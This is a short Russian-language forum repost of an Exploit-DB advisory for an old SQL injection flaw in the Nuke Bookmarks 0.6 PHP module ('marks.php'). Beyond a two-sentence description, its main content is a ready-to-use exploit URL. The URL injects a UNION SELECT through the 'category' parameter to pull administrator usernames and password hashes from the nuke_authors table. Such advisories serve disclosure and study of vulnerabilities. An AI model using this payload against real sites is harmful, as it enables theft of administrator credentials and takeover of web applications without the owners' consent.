Exploit Nuke BookMarks 0.6 - 'Marks.php' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25284
Проверка EDB
  1. Пройдено
Автор
GERARDO ASTHAROT DI GIACOMO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-03-26
Код:
source: https://www.securityfocus.com/bid/12908/info

Nuke Bookmarks is prone to an SQL injection vulnerability.

This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. 

http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors
 
Источник
www.exploit-db.com

Похожие темы